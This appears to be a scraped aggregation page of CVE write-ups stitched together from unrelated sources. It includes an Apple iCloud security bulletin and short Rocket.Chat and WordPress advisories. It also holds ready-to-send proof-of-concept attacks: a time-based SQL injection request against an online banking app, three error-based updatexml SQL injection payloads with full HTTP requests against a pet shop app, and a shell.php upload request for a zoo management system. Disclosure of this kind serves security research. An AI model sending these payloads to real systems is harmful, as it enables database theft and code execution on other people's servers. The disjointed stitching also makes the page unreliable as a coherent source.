Online Banking System v1.0 was discovered to contain a SQL injection vulnerability via the cust_id parameter at /net-banking/edit_customer_action.php.

**Vulnerability file address**

net-banking/edit_customer_action.php from line 16,The $_GET['cust_id'] parameter is controllable, the parameter cust\_id can be passed through get, and the $_GET['cust_id'] is not protected from sql injection, line 59 if (($conn->query($sql0) === TRUE)) { ?> made a sql query,resulting in sql injection

......
......
......
    if (isset($\_GET\['cust\_id'\])) {
        $\_SESSION\['cust\_id'\] = $\_GET\['cust\_id'\];
    }

    $fname = mysqli\_real\_escape\_string($conn, $\_POST\["fname"\]);
    $lname = mysqli\_real\_escape\_string($conn, $\_POST\["lname"\]);
    $dob = mysqli\_real\_escape\_string($conn, $\_POST\["dob"\]);
    $aadhar = mysqli\_real\_escape\_string($conn, $\_POST\["aadhar"\]);
    $email = mysqli\_real\_escape\_string($conn, $\_POST\["email"\]);
    $phno = mysqli\_real\_escape\_string($conn, $\_POST\["phno"\]);
    $address = mysqli\_real\_escape\_string($conn, $\_POST\["address"\]);
    $branch = mysqli\_real\_escape\_string($conn, $\_POST\["branch"\]);
    $acno = mysqli\_real\_escape\_string($conn, $\_POST\["acno"\]);
    $pin = mysqli\_real\_escape\_string($conn, $\_POST\["pin"\]);
    $cus\_uname = mysqli\_real\_escape\_string($conn, $\_POST\["cus\_uname"\]);
    $cus\_pwd = mysqli\_real\_escape\_string($conn, $\_POST\["cus\_pwd"\]);

    $sql0 = "UPDATE customer SET first\_name = '$fname',
                                 last\_name = '$lname',
                                 dob = '$dob',
                                 aadhar\_no = '$aadhar',
                                 email = '$email',
                                 phone\_no = '$phno',
                                 address = '$address',
                                 branch = '$branch',
                                 account\_no = '$acno',
                                 pin = '$pin',
                                 uname = '$cus\_uname',
                                 pwd = '$cus\_pwd'
                            WHERE cust\_id=".$\_SESSION\['cust\_id'\];
......
......
......
if (($conn\->query($sql0) === TRUE)) { ?>
......
......
......

**POC**

GET /net-banking/edit\_customer\_action.php?cust\_id=666 AND (SELECT 5721 FROM (SELECT(SLEEP(5)))pcwq) HTTP/1.1
Host: www.bank.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

**Attack results pictures**

CVE-2022-40122: Found a vulnerability · Issue #15 · zakee94/online-banking-system

A SQL injection vulnerability exists in Rocket.Chat <v3.18.6, <v4.4.4 and <v4.7.3 which can allow an attacker to retrieve a reset password token through or a 2fa secret.

CVE-2022-32211

Unauthenticated Optin Campaign Cache Deletion vulnerability in MailOptin plugin <= 1.2.49.0 at WordPress.

CVE-2022-36340

An out-of-bounds read was addressed with improved input validation. This issue is fixed in iCloud for Windows 11.4, iOS 14.0 and iPadOS 14.0, watchOS 7.0, tvOS 14.0, iCloud for Windows 7.21, iTunes for Windows 12.10.9. Processing a maliciously crafted tiff file may lead to a denial-of-service or potentially disclose memory contents.

This document describes the security content of iCloud for Windows 7.21.

**About Apple security updates**

For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security updates page.

Apple security documents reference vulnerabilities by CVE-ID when possible.

For more information about security, see the Apple Product Security page.

**iCloud for Windows 7.21**

Released September 24, 2020

**ImageIO**

Available for: Windows 7 and later

Impact: Processing a maliciously crafted tiff file may lead to a denial-of-service or potentially disclose memory contents

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2020-36521: Xingwei Lin of Ant-Financial Light-Year Security Lab

Entry added May 25, 2022

**SQLite**

Available for: Windows 7 and later

Impact: A remote attacker may be able to cause a denial of service

Description: This issue was addressed with improved checks.

CVE-2020-9991

Entry added November 12, 2020

**SQLite**

Available for: Windows 7 and later

Impact: Multiple issues in SQLite

Description: Multiple issues were addressed by updating SQLite to version 3.32.3.

CVE-2020-15358

Entry added November 12, 2020

**WebKit**

Available for: Windows 7 and later

Impact: Processing maliciously crafted web content may lead to a cross site scripting attack

Description: An input validation issue was addressed with improved input validation.

CVE-2020-9952: Ryan Pickren (ryanpickren.com)

Information about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. Contact the vendor for additional information.

Published Date: May 25, 2022

CVE-2020-36521: About the security content of iCloud for Windows 7.21

A NoSQL-Injection information disclosure vulnerability vulnerability exists in Rocket.Chat <v5, <v4.8.2 and <v4.7.5 in the getS3FileUrl Meteor server method that can disclose arbitrary file upload URLs to users that should not be able to access.

CVE-2022-35246

The Image Hover Effects Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Title & Description values that can be added to an Image Hover in versions up to, and including, 9.7.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. By default, the plugin only allows administrators access to edit Image Hovers, however, if a site admin makes the plugin's features available to lower privileged users through the 'Who Can Edit?' setting then this can be exploited by those users.

CVE-2022-2937: Vulnerability Advisories - Wordfence

Online Pet Shop We App v1.0 is vulnerable to SQL injection via /pet_shop/classes/Master.php?f=delete_sub_category,id

**Online Pet Shop We App v1.0 by oretnom23 has SQL injection**

BUG\_Author: Lime

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14839/online-pet-shop-we-app-using-php-and-paypal-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /pet\_shop/classes/Master.php?f=delete\_sub\_category,id

Vulnerability location: /pet\_shop/classes/Master.php?f=delete\_sub\_category,id

dbname=pet\_shop\_db,length=11

\[+\] Payload: id=5' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /pet\_shop/classes/Master.php?f\=delete\_sub\_category HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=k8u390ikl968phg971gmpmhtj5
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
id=5' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-40934: Bug_report/SQLi-3.md at main · lime-10010/Bug_report

Online Pet Shop We App v1.0 is vulnerable to SQL Injection via /pet_shop/classes/Master.php?f=delete_category,id.

**Online Pet Shop We App v1.0 by oretnom23 has SQL injection**

BUG\_Author: Lime

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14839/online-pet-shop-we-app-using-php-and-paypal-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /pet\_shop/classes/Master.php?f=delete\_category,id

Vulnerability location: /pet\_shop/classes/Master.php?f=delete\_category,id

dbname=pet\_shop\_db,length=11

\[+\] Payload: id=4' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /pet\_shop/classes/Master.php?f\=delete\_category HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=k8u390ikl968phg971gmpmhtj5
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
id=4' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-40935: Bug_report/SQLi-2.md at main · lime-10010/Bug_report

Online Pet Shop We App v1.0 by oretnom23 is vulnerable to SQL injection via /pet_shop/classes/Master.php?f=delete_order,id.

**Online Pet Shop We App v1.0 by oretnom23 has SQL injection**

BUG\_Author: Lime

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14839/online-pet-shop-we-app-using-php-and-paypal-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /pet\_shop/classes/Master.php?f=delete\_order,id

Vulnerability location: /pet\_shop/classes/Master.php?f=delete\_order,id

dbname=pet\_shop\_db,length=11

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /pet\_shop/classes/Master.php?f\=delete\_order HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=k8u390ikl968phg971gmpmhtj5
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-40933: Bug_report/SQLi-1.md at main · lime-10010/Bug_report

In Zoo Management System v1.0, there is an arbitrary file upload vulnerability in the picture upload point of the "gallery" file of the "Gallery" module in the background management system.

Permalink

Cannot retrieve contributors at this time

**Zoo Management System v1.0 by pushpam02 has arbitrary code execution (RCE)**

BUG\_Author: Lime

Admind login account: admin@mail.com/Password@123

vendor: https://www.sourcecodester.com/php/15347/zoo-management-system-source-code-php-mysql-database.html

Vulnerability url: http://ip/ZooManagementSystem/admin/public\_html/gallery

Loophole location：There is an arbitrary file upload vulnerability (RCE) in the picture upload point of the "gallery" file of the "Gallery" module in the background management system

Request package for file upload：

POST /ZooManagementSystem/admin/public\_html/gallery HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/ZooManagementSystem/admin/public\_html/gallery
Cookie: PHPSESSID=5d10vq7lgptbau7foskstiug7i
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------29223726215286
Content-Length: 330
\-----------------------------29223726215286
Content-Disposition: form-data; name="image"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------29223726215286
Content-Disposition: form-data; name="submit\_image"
\-----------------------------29223726215286--

The files will be uploaded to this directory \\ZooManagementSystem\\img\\gallery\\image 

We visited the directory of the file in the browser and found that the code had been executed

Tag

#sql